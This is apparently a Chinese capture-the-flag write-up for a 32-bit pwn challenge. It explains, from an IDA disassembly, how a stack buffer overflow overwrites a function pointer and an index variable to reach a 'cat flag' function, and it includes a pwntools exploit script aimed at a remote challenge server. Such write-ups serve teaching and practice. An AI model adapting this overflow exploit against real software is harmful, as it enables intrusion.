根据ida反汇编的结果可以发现有两处溢出点,第一处溢出点没什么作用,只能观察第二处溢出点
可以观察到箭头处是个函数指针,&v3 是v3在栈上的地址,&v3 + --v14 是根据&v3在栈上移动,上面的for循环是用来改变v14的值,根据溢出点函数指针v3到v12 ,变量v14都可以被我们控制,接下来再找找有没有system函数
发现目标函数,接下来我的想法是利用缓冲区溢出把函数指针v12 覆盖为地址0x080486cc,接下来再控制v14的值为10, 那么 &v3+ --v14 便会指向
v12,随后cat flag
exp:
from pwn import *
context.log_level = 'debug'
c = remote("111.198.29.45", 31755)
payload = 'a'*0x44 + p32(0x080486CC) + 'a'*0x20 + p32(0x8)
c.recvuntil(">")
c.sendline("bbb")
c.sendlineafter("> ", payload)
c.interactive()
flag:
补充:
由于字符0x9 与0xa 是坏字符, 读到这两个字符时会造成截断, v14 的值就无法被覆盖